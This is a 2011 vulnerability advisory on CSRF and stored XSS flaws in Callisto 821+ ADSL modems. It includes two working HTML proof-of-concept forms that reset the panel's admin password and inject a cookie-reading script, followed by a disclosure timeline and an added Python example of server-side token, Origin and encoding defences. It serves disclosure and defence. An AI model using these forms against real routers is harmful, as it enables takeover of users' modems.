
Callisto 821+ Cross Site Request Forgery / Cross Site Scripting

Posted May 30, 2011
Authored by MustLive

Callisto 821+ ADSL modems suffer from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 0e16cf1eb86fda073d42b60cae20ced062f3ed4454b91874e9820d5bfad4540b

Hello list!

I want to warn you about security vulnerabilities in the ADSL modem Callisto
821+ (SI2000 Callisto821+ Router).

These are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities. In April I already drew the attention of Ukrtelecom's
representative (this modem was bought at Ukrtelecom) to multiple
vulnerabilities in this model of Callisto modems (other models could
also be affected).

SecurityVulns ID: 11700.

-------------------------
Affected products:
-------------------------

The following model is vulnerable: SI2000 Callisto821+ Router: X7821 Annex A
v1.0.0.0 / Argon 4x1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. This model with other
firmware, and other models of Callisto, must also be vulnerable.

----------
Details:
----------

These attacks should be conducted on a modem owner who is logged into the
control panel. Taking into account that it's unlikely to catch him in this
state, it's possible to use the previously mentioned vulnerabilities
(http://websecurity.com.ua/5161/) to conduct a remote login (to log him
into the control panel). After that it's possible to conduct a CSRF
or XSS attack.

CSRF (WASC-09):

This vulnerability allows changing the password of the default user.

http://websecurity.com.ua/uploads/2011/Callisto%20821+%20CSRF.html

<html>
<head>
<title>Callisto 821+ CSRF exploit (C) 2011 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://192.168.1.1/configuration/auth_edit_user.html/edit" method="post">
<input type="hidden" name="EmWeb_ns:vim:3" value="/configuration/authentication.html">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:password" value="password">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:mayConfigure" value="true">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:comment" value="Default admin user">
</form>
</body>
</html>


XSS (WASC-08):

In this form there are also two persistent XSS vulnerabilities.

http://websecurity.com.ua/uploads/2011/Callisto%20821+%20XSS.html

<html>
<head>
<title>Callisto 821+ XSS exploit (C) 2011 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://192.168.1.1/configuration/auth_edit_user.html/edit" method="post">
<input type="hidden" name="EmWeb_ns:vim:3" value="/configuration/authentication.html">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:password" value="password">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:mayConfigure" value="true">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:comment" value="<script>alert(document.cookie)</script>">
</form>
</body>
</html>

In this case the code will be executed immediately, and also when visiting
the pages http://192.168.1.1/system/events.html and
http://192.168.1.1/shared/event_log_selection.html.

http://websecurity.com.ua/uploads/2011/Callisto%20821+%20XSS2.html

In this case the code will be executed immediately, and also when visiting
the page http://192.168.1.1/configuration/authentication.html.

------------
Timeline:
------------

2011.04.14 - informed Ukrtelecom about multiple vulnerabilities in the modems
which they give (sell) to their clients.
2011.05.25 - disclosed on my site.
2011.05.26 - informed developers (Iskratel).

I mentioned these vulnerabilities on my site
(http://websecurity.com.ua/5165/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
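
Added example, not part of the original advisory or the vendor's firmware: the two server-side controls that would stop the forms above, namely a session-bound token plus Origin check on the edit request, and output encoding of the stored comment field. The csrf_token field, SERVER_KEY and the session id are assumptions; the form field name and the 192.168.1.1 address are taken from the advisory.

```python
import hashlib
import hmac
import html
import secrets

# Assumptions (not from the advisory): a per-boot secret, a session id the
# panel already issues, and a hidden "csrf_token" field added to the form.
SERVER_KEY = secrets.token_bytes(32)
PANEL_ORIGIN = "http://192.168.1.1"
COMMENT_FIELD = "EmWeb_ns:vim:2.ImUsers.qe1dg7bm:comment"  # name from the form above


def csrf_token(session_id: str) -> str:
    """Token bound to one session; a page on another origin cannot read or guess it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def accept_edit(headers: dict, form: dict, session_id: str) -> bool:
    """Gate for POST /configuration/auth_edit_user.html/edit."""
    # 1. Browsers send Origin on cross-site POSTs; reject any foreign value.
    origin = headers.get("Origin")
    if origin is not None and origin != PANEL_ORIGIN:
        return False
    # 2. Require the session-bound token, compared in constant time.
    supplied = form.get("csrf_token", "").encode()
    return hmac.compare_digest(supplied, csrf_token(session_id).encode())


def render_comment(form: dict) -> str:
    """Encode the stored comment on output so markup is displayed, not executed."""
    return "<td>" + html.escape(form.get(COMMENT_FIELD, ""), quote=True) + "</td>"


# Constructed sample requests (not captured traffic).
SESSION = "constructed-session-id"
FORGED = {"headers": {"Origin": "http://other-site.example"},
          "form": {COMMENT_FIELD: "<script>alert(document.cookie)</script>"}}
LEGIT = {"headers": {"Origin": PANEL_ORIGIN},
         "form": {COMMENT_FIELD: "Default admin user",
                  "csrf_token": csrf_token(SESSION)}}

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("legit", LEGIT)):
        print(name, accept_edit(req["headers"], req["form"], SESSION))
    print(render_comment(FORGED["form"]))
```

The token check is the primary control; the Origin check only adds an early reject, since a missing Origin header is allowed through to the token comparison.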
